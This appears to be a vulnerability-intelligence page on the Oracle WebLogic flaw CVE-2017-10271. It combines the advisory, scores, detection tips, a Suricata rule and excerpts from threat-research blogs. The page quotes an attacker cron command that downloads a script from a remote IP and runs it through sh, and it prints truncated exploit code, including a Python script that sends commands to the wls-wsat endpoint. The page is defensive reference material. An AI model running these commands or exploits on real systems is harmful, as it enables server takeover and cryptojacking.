CVE-2017-10271
published 2017-10-19CVE-2017-10271: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are…
PriorityP194high7.5CVSS 3.1
AVNACLPRNUINSUCNINAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-08-10
Exploited in the wild
EPSS
99.99%
100.0th percentile
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | weblogic_server | — | — |
| oracle | weblogic_server | — | — |
| oracle | weblogic_server | — | — |
| oracle | weblogic_server | — | — |
| oracle_corporation | weblogic_server | — | — |
| oracle_corporation | weblogic_server | — | — |
| oracle_corporation | weblogic_server | — | — |
| oracle_corporation | weblogic_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandecho "* * * * * wget -q hxxp://94.250.253.178/logo8.sh -O - | sh" >> /tmp/cron || true && crontab /tmp/cron↗
- →Monitor for inbound HTTP POST requests to Oracle WebLogic on port 7001/TCP targeting the WLS-WSAT endpoint, which is the attack vector for CVE-2017-10271 ↗
- →Detect post-exploitation shell script execution dropping files to /tmp/ (vmak, httpd5_w1.conf, logo8.sh) and subsequent cron persistence via /tmp/cron ↗
- →Alert on process execution of 'pkill -f minergate' or 'pkill -f minergate-cli' as a pre-mining cleanup step indicative of this campaign ↗
- →Detect PowerShell post-exploit downloading executables saved as simple numeric filenames (e.g. '13.exe') in the TEMP folder following WebLogic exploitation ↗
- →Detect outbound connections to port 57890 from WebLogic servers, used by the Panda actor to retrieve miner config files ↗
- →Detect creation or access of the PHP webshell at path /public/hydra.php, dropped by Panda actor post-exploitation of CVE-2017-10271 ↗
- →Check Point IPS signature available for this CVE: 'Oracle WebLogic WLS Security Component Remote Code Execution (CVE-2017-10271)' ↗
- ·Oracle WebLogic listens on port 7001/TCP by default; this is the primary attack surface for CVE-2017-10271 exploitation and should be restricted or monitored at the network perimeter ↗
- ·Affected versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, and 12.2.1.2.0; unpatched servers remain exploitable by unauthenticated remote attackers via T3 protocol ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
vulncheck7.5HIGH
cisa7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-h7p4-68h5-84f3: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security)
ghsa_unreviewed·2022-05-13
CVE-2017-10271 [HIGH] CWE-306 GHSA-h7p4-68h5-84f3: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security)
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
VulnCheck
Oracle Corporation WebLogic Server Remote Code Execution Vulnerability
vulncheck·2017·CVSS 7.5
CVE-2017-10271 [HIGH] Oracle Corporation WebLogic Server Remote Code Execution Vulnerability
Oracle Corporation WebLogic Server Remote Code Execution Vulnerability
Oracle Corporation WebLogic Server contains a vulnerability that allows for remote code execution.
Affected: Oracle WebLogic Server
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/; https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/; https://isc.sans.edu/diary/Criminals+Dont+Read+Instructions+or+Use+Strong+Passwords/23850; https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html; https://www.lacework.com/blog/elf-of-the-month-new-lucky-ransomware-sample
CISA
Oracle Corporation WebLogic Server Remote Code Execution Vulnerability
cisa·2022-02-10·CVSS 7.5
CVE-2017-10271 [HIGH] Oracle Corporation WebLogic Server Remote Code Execution Vulnerability
Vulnerability: Oracle Corporation WebLogic Server Remote Code Execution Vulnerability
Affected: Oracle WebLogic Server
Oracle Corporation WebLogic Server contains a vulnerability that allows for remote code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2017-10271
Remediation Due Date: 2022-08-10
Suricata
ET COINMINER CoinMiner Malicious Authline Seen After CVE-2017-10271 Exploit
suricata·2018-01-04·CVSS 7.5
CVE-2017-10271 [HIGH] ET COINMINER CoinMiner Malicious Authline Seen After CVE-2017-10271 Exploit
ET COINMINER CoinMiner Malicious Authline Seen After CVE-2017-10271 Exploit
Rule: alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET COINMINER CoinMiner Malicious Authline Seen After CVE-2017-10271 Exploit"; flow:established,to_server; content:"{|22|id|22 3A|"; depth:6; content:"|22|method|22 3a 20 22|mining.authorize|22 2c|"; within:100; content:"|22|params|22|"; within:50; content:"|5b 22|4AQe5sAFWZKECiaeNTt59LG7kVtqRoSRJMjrmQ6GiMFAeUvoL3MFeTE6zwwHkFPrAyNw2JHDxUSWL82RiZThPpk4SEg7Vqe|22 2c 20 22|"; distance:0; reference:url,otx.alienvault.com/pulse/5a4e1c4993199b299f90a212; classtype:coin-mining; sid:2025186; rev:1; metadata:attack_target Client_Endpoint, created_at 2018_01_04, cve CVE_2017_10271, deployment Perimeter, deployment Datacenter, malware_family CoinMiner, confidence High,
Exploit-DB
Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit)
exploitdb·2018-01-29·CVSS 7.5
CVE-2017-10271 [HIGH] Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit)
Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Oracle WebLogic wls-wsat Component Deserialization RCE',
'Description' => %q(
The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization
remote code execution vulnerability. Supported versions that are affected are
10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin
of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT,
HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check
and will not be used when executing the exploit itself.
Exploit-DB
Oracle WebLogic < 10.3.6 - 'wls-wsat' Component Deserialisation Remote Command Execution
exploitdb·2018-01-03·CVSS 7.5
CVE-2017-10271 [HIGH] Oracle WebLogic < 10.3.6 - 'wls-wsat' Component Deserialisation Remote Command Execution
Oracle WebLogic
http://{lhost}:{lport}/{random_uri}
'''
return generic_check_payload.format(
lhost=self.lhost, lport=self.lport, random_uri=random_uri)
def get_process_builder_payload(self):
process_builder_payload = '''
{cmd_base}
{cmd_opt}
{cmd_payload}
'''
return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),
cmd_payload=self.cmd_payload)
def print_banner(self):
print("=" * 80)
print("CVE-2017-10271 RCE Exploit")
print("written by: Kevin Kirsche (d3c3pt10n)")
print("Remote Target: {rhost}".format(rhost=self.url))
print("Shell Listener: {lhost}:{lport}".format(
lhost=self.lhost, lport=self.lport))
print("=" * 80)
def post_exploit(self, data):
headers = {
"Content-Type":
"text/xml;charset=UTF-8",
"User-Agent":
"Mozilla/
Exploit-DB
Oracle WebLogic Server 10.3.6.0.0 / 12.x - Remote Command Execution
exploitdb·2017-12-26
CVE-2017-10271 Oracle WebLogic Server 10.3.6.0.0 / 12.x - Remote Command Execution
Oracle WebLogic Server 10.3.6.0.0 / 12.x - Remote Command Execution
---
import requests
import sys
url_in = sys.argv[1]
payload_url = url_in + "/wls-wsat/CoordinatorPortType"
payload_header = {'content-type': 'text/xml'}
def payload_command (command_in):
html_escape_table = {
"&": "&",
'"': """,
"'": "'",
">": ">",
""+"".join(html_escape_table.get(c, c) for c in command_in)+""
payload_1 = " \n" \
" " \
" \n" \
" \n" \
" \n" \
" " \
" " \
" cmd " \
" " \
" " \
" /c " \
" " \
" " \
+ command_filtered + \
" " \
" " \
" " \
" " \
" " \
" " \
" " \
" " \
""
return payload_1
def do_post(command_in):
result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
if result.status_code == 500:
print "Command Executed \n"
else:
print "Something Went Wrong \n"
pri
Nuclei
Oracle WebLogic Server - Remote Command Execution
nuclei·CVSS 7.5
CVE-2017-10271 [HIGH] Oracle WebLogic Server - Remote Command Execution
Oracle WebLogic Server - Remote Command Execution
The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.
Template:
id: CVE-2017-10271
info:
name: Oracle WebLogic Server - Remote Command Execution
author: dr_set,ImNightmaree,true13
severity: high
description: |
The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2
Metasploit
Oracle WebLogic wls-wsat Component Deserialization RCE
metasploit
Oracle WebLogic wls-wsat Component Deserialization RCE
Oracle WebLogic wls-wsat Component Deserialization RCE
The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check and will not be used when executing the exploit itself.
Hackernews
⚡ Weekly Recap: Telecom Sleeper Cells, LLM Jailbreaks, Apple Forces U.K. Age Checks and More
blogs_hackernews·2026-03-30·CVSS 9.3
[CRITICAL] ⚡ Weekly Recap: Telecom Sleeper Cells, LLM Jailbreaks, Apple Forces U.K. Age Checks and More
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## ⚡ Weekly Recap: Telecom Sleeper Cells, LLM Jailbreaks, Apple Forces U.K. Age Checks and More
Some weeks are loud. This one was quieter but not in a good way. Long-running operations are finally hitting courtrooms, old attack methods are showing up in new places, and research that stopped being theoretical right around the time defenders stopped paying attention.
There's a bit of everything this week. Persistence plays, legal wins, influence ops, and at least one thing that looks boring until you see what it connects to.
All of it below. Let's go.
## ⚡ Threat of the Week
Citrix Flaw Comes Under Active Exploitation — A cr
Greynoiseio
Coordinated Cloud-Based Scanning Operation Targets 75 Known Exposure Points in One Day
blogs_greynoiseio·2025-05-27
Coordinated Cloud-Based Scanning Operation Targets 75 Known Exposure Points in One Day
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Checkpoint
3rd June – Threat Intelligence Report
blogs_checkpoint·2024-06-03
CVE-2024-24919 3rd June – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 3rd June – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 3rd June, please download our Threat_Intelligence Bulletin .
TOP ATTACKS AND BREACHES
ShinyHunters, a notorious cybercrime gang offered for sale on a cybercrime forum data of Ticketmaster, ticket sales and distribution company, and of Santander bank. The alleged breaches have resulted in the potential exposure of personal data belonging to millions of customers. Some assumption claim that actor gained access to Ti
Securelist
IT threat evolution Q3 2022
blogs_securelist·2022-11-18
IT threat evolution Q3 2022
Table of Contents
- Targeted attacks
- Other malware
Authors
- David Emm
- IT threat evolution in Q3 2022
- IT threat evolution in Q3 2022. Non-mobile statistics
- IT threat evolution in Q3 2022. Mobile statistics
## Targeted attacks
### CosmicStrand: discovery of a sophisticated UEFI rootkit
In July, we reported a rootkit that we found in modified Unified Extensible Firmware Interface (UEFI) firmware, the code that loads and initiates the boot process when the computer is turned on. Rootkits are malware implants that are installed deep in the operating system. Difficult to detect, they ensure that a computer remains infected even if someone reinstalls the operating system or replaces the hard drive. However, they aren’t easy to create: the slightest programming error could crash th
Securelist
IT threat evolution Q3 2022
blogs_securelist·2022-11-18
IT threat evolution Q3 2022
Table of Contents
Targeted attacks
CosmicStrand: discovery of a sophisticated UEFI rootkit
Andariel deploys DTrack and Maui ransomware
VileRAT: DeathStalker’s continuous strike at foreign and crypto-currency exchanges
Kimsuky’s GoldDragon cluster and C2 operations
Targeted attacks on industrial enterprises
Other malware
Prilex: the pricey prickle credit card complex
Luna and Black Basta: new ransomware for Windows, Linux and ESXi
Malicious packages in online code repositories
Cyberthreats facing gamers
NullMixer: oodles of Trojans in a single dropper
Potential threat in the browser
Authors
David Emm
IT threat evolution in Q3 2022
IT threat evolution in Q3 2022. Non-mobile statistics
IT threat evolution in Q3 2022. Mobile statistics
## Targeted attacks
## CosmicStrand: d
Securelist
Andariel deploys DTrack and Maui ransomware
blogs_securelist·2022-08-09
Andariel deploys DTrack and Maui ransomware
Table of Contents
- Background
- DTrack malware
- Maui ransomware
- Similar DTrack malware on different victims
- Additional DTrack module and initial infection method
- Victims
- Attribution
- Conclusions
Authors
- Kurt Baumgartner
- Seongsu Park
On July 7, 2022, the CISA published an alert, entitled, “North Korean State-Sponsored Cyber Actors Use Maui Ransomware To Target the Healthcare and Public Health Sector,” related to a Stairwell report, “Maui Ransomware.” Later, the Department of Justice announced that they had effectively clawed back $500,000 in ransom payments to the group, partly thanks to new legislation. We can confirm a Maui ransomware incident in 2022, and add some incident and attribution findings.
We extend their “first seen” date from the reported May 2021 to April
Securelist
Andariel deploys DTrack and Maui ransomware
blogs_securelist·2022-08-09
Andariel deploys DTrack and Maui ransomware
Table of Contents
Background
DTrack malware
Maui ransomware
Similar DTrack malware on different victims
Additional DTrack module and initial infection method
Victims
Attribution
Conclusions
Authors
Kurt Baumgartner
Seongsu Park
On July 7, 2022, the CISA published an alert, entitled, “ North Korean State-Sponsored Cyber Actors Use Maui Ransomware To Target the Healthcare and Public Health Sector ,” related to a Stairwell report, “ Maui Ransomware .” Later, the Department of Justice announced that they had effectively clawed back $500,000 in ransom payments to the group, partly thanks to new legislation. We can confirm a Maui ransomware incident in 2022, and add some incident and attribution findings.
We extend their “first seen” date from the reported May 2021 to April 15th 202
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Unit42
WatchDog: Exposing a Cryptojacking Campaign That’s Operated for Two Years
blogs_unit42·2021-02-17
WatchDog: Exposing a Cryptojacking Campaign That’s Operated for Two Years
## Executive Summary
Unit 42 researchers are exposing one of the largest and longest-lasting Monero cryptojacking operations known to exist. The operation is called WatchDog, taken from the name of a Linux daemon called watchdogd. The WatchDog mining operation has been running since Jan. 27, 2019, and has collected at least 209 Monero (XMR), valued to be around $32,056 USD. Researchers have determined that at least 476 compromised systems, composed primarily of Windows and NIX cloud instances, have been performing mining operations at any one time for over two years.
Cryptojacking is the process of performing cryptomining operations on systems which are not owned and maintained by the mining operators. Malicious cryptojacking operations are currently estimated to affect 23% of cloud envi
Unit42
WatchDog: Exposing a Cryptojacking Campaign That’s Operated for Two Years
blogs_unit42·2021-02-17
WatchDog: Exposing a Cryptojacking Campaign That’s Operated for Two Years
Threat Research Center
Threat Research
Cloud Cybersecurity Research
## WatchDog: Exposing a Cryptojacking Campaign That’s Operated for Two Years
Nathaniel Quist
Published: February 17, 2021
Cloud Cybersecurity Research
Malware
Threat Research
Cryptojacking
GoLang
Monero
XMRig
## Executive Summary
Unit 42 researchers are exposing one of the largest and longest-lasting Monero cryptojacking operations known to exist. The operation is called WatchDog, taken from the name of a Linux daemon called watchdogd . The WatchDog mining operation has been running since Jan. 27, 2019, and has collected at least 209 Monero (XMR), valued to be around $32,056 USD. Researchers have determined that at least 476 compromised systems, composed primarily of Windows and NIX cloud instances, have
Unit42
Pro-Ocean: Rocke Group’s New Cryptojacking Malware
blogs_unit42·2021-01-28·CVSS 9.8
[CRITICAL] Pro-Ocean: Rocke Group’s New Cryptojacking Malware
Threat Research Center
Threat Research
Cloud Cybersecurity Research
## Pro-Ocean: Rocke Group’s New Cryptojacking Malware
Aviv Sasson
Published: January 28, 2021
Cloud Cybersecurity Research
Malware
Threat Research
Cryptocurrency
Monero
Rocke
## Executive Summary
In 2019, Unit 42 researchers documented cloud-targeted malware used by the Rocke Group to conduct cryptojacking attacks to mine for Monero. Since then, cybersecurity companies have had the malware on their radar, which hampered Rocke Group’s cryptojacking operation. In response, the threat actors updated the malware.
Here, we uncover a revised version of the same cloud-targeted cryptojacking malware, which now includes new and improved rootkit and worm capabilities. We also detail the hiding techniques used by th
Unit42
Pro-Ocean: Rocke Group’s New Cryptojacking Malware
blogs_unit42·2021-01-28·CVSS 9.8
[CRITICAL] Pro-Ocean: Rocke Group’s New Cryptojacking Malware
## Executive Summary
In 2019, Unit 42 researchers documented cloud-targeted malware used by the Rocke Group to conduct cryptojacking attacks to mine for Monero. Since then, cybersecurity companies have had the malware on their radar, which hampered Rocke Group’s cryptojacking operation. In response, the threat actors updated the malware.
Here, we uncover a revised version of the same cloud-targeted cryptojacking malware, which now includes new and improved rootkit and worm capabilities. We also detail the hiding techniques used by the malware to dodge cybersecurity companies’ detection methods, while explaining its four-module structure. We’ve named the malware Pro-Ocean after the name the attacker chose for the installation script.
Pro-Ocean uses known vulnerabilities to target cloud a
Tenable
Daisy Chaining: How Vulnerabilities Can Be Greater Than the Sum of Their Parts
blogs_tenable·2021-01-21
Daisy Chaining: How Vulnerabilities Can Be Greater Than the Sum of Their Parts
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Checkpoint
Rudeminer, Blacksquid and Lucifer Walk Into A Bar
blogs_checkpoint·2020-09-15·CVSS 9.8
CVE-2018-10561 [CRITICAL] Rudeminer, Blacksquid and Lucifer Walk Into A Bar
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## Rudeminer, Blacksquid and Lucifer Walk Into A Bar
Research by David Driker, Amir Landau
Background
Lucifer is a Windows crypto miner and DDOS hybrid malware. Three months ago, researcher
Unit42
Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
blogs_unit42·2020-06-24·CVSS 9.8
[CRITICAL] Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
Threat Research Center
Threat Research
Vulnerabilities
## Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
Ken Hsu
Durgesh Sangvikar
Zhibin Zhang
Chris Navarrete
Published: June 24, 2020
Threat Research
Vulnerabilities
Cryptocurrency mining
Cryptojacking
DDoS
Lucifer
## Executive Summary
On May 29, 2020, Unit 42 researchers discovered a new variant of a hybrid cryptojacking malware from numerous incidents of CVE-2019-9081 exploitation in the wild. A closer look revealed the malware, which we’ve dubbed “Lucifer”, is capable of conducting DDoS attacks and well-equipped with all kinds of exploits against vulnerable Windows hosts. The first wave of the campaign stopped on June 10, 2020. The attacker th
Unit42
Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
blogs_unit42·2020-06-24·CVSS 9.8
CVE-2019-9081 [CRITICAL] Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
## Executive Summary
On May 29, 2020, Unit 42 researchers discovered a new variant of a hybrid cryptojacking malware from numerous incidents of CVE-2019-9081 exploitation in the wild. A closer look revealed the malware, which we’ve dubbed “Lucifer”, is capable of conducting DDoS attacks and well-equipped with all kinds of exploits against vulnerable Windows hosts. The first wave of the campaign stopped on June 10, 2020. The attacker then resumed their campaign on June 11, 2020, spreading an upgraded version of the malware and wreaking havoc. The sample was compiled on Thursday, June 11, 2020 10:39:47 PM UTC and caught by Palo Alto Networks Next-Generation Firewall. At the time of writing, the campaign’s still ongoing.
Lucifer is quite powerful in its capabilities. Not only is it capable
Tenable
How VPR Helped Prioritize the Most Dangerous CVEs in 2019
blogs_tenable·2020-04-30
How VPR Helped Prioritize the Most Dangerous CVEs in 2019
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Qualys
Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking
blogs_qualys·2019-12-27·CVSS 8.8
[HIGH] Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking
A recent report identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advance Persistent Threat (APT) actors from all parts of the world.
The list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.
No.
CVE
Products Affected by CVE
CVSS Score (NVD)
Examples of Threat Actors
1
CVE-2017-11882
Microsoft Office
7.8
APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia)
2
Qualys
Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking | Qualys
blogs_qualys·2019-12-27·CVSS 8.8
[HIGH] Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking | Qualys
A recent report identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advance Persistent Threat (APT) actors from all parts of the world.
The list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.
No.
CVE
Products Affected by CVE
CVSS Score (NVD)
Examples of Threat Actors
1
CVE-2017-11882
Microsoft Office
7.8
APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia)
2
CVE-2018-
Zscaler
A look at the recent BuleHero botnet payload | Zscaler
blogs_zscaler·2019-12-12
A look at the recent BuleHero botnet payload | Zscaler
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Securelist
APT review: what the world’s threat actors got up to in 2019
blogs_securelist·2019-12-04
APT review: what the world’s threat actors got up to in 2019
Table of Contents
- Compromising supply chains
- Disinformation
- Lost in Translation and Dark Universe
- Mobile attacks
- Established threat actors continue to revamp their tools
- Evolution of the ‘newcomers’
- Privacy matters
- Final thoughts
Authors
- David Emm
What were the most interesting developments in terms of APT activity during the year and what can we learn from them?
This is not an easy question to answer, because researchers have only partial visibility and it´s impossible to fully understand the motivation for some attacks or the developments behind them. However, let´s try to approach the problem from different angles in order to get a better understanding of what happened with the benefit of hindsight and perspective.
## Compromising supply chains
Targeting supply
Securelist
APT review: what the world’s threat actors got up to in 2019
blogs_securelist·2019-12-04
APT review: what the world’s threat actors got up to in 2019
Table of Contents
Compromising supply chains
Disinformation
Lost in Translation and Dark Universe
Mobile attacks
Established threat actors continue to revamp their tools
Evolution of the ‘newcomers’
Privacy matters
Final thoughts
Authors
David Emm
What were the most interesting developments in terms of APT activity during the year and what can we learn from them?
This is not an easy question to answer, because researchers have only partial visibility and it´s impossible to fully understand the motivation for some attacks or the developments behind them. However, let´s try to approach the problem from different angles in order to get a better understanding of what happened with the benefit of hindsight and perspective.
## Compromising supply chains
Targeting supply chains has
Securelist
APT trends report Q3 2019
blogs_securelist·2019-10-16
APT trends report Q3 2019
Table of Contents
- The most remarkable findings
- Russian-speaking activity
- Chinese-speaking activity
- Middle East
- Southeast Asia and the Korean Peninsula
- Other interesting discoveries
- Final thoughts
Authors
- GReAT
For more than two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.
This is our latest installment, focusing on activities that we observed during Q3 2019.
Readers who would
Securelist
APT trends report Q3 2019
blogs_securelist·2019-10-16
APT trends report Q3 2019
Table of Contents
The most remarkable findings
Russian-speaking activity
Chinese-speaking activity
Middle East
Southeast Asia and the Korean Peninsula
Other interesting discoveries
Final thoughts
Authors
GReAT
For more than two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.
This is our latest installment, focusing on activities that we observed during Q3 2019.
Readers who would like to lea
Talos
Cryptocurrency miners aren’t dead yet: Documenting the voracious but simple “Panda”
blogs_talos·2019-09-17·CVSS 7.5
[HIGH] Cryptocurrency miners aren’t dead yet: Documenting the voracious but simple “Panda”
By Christopher Evans and David Liebenberg.
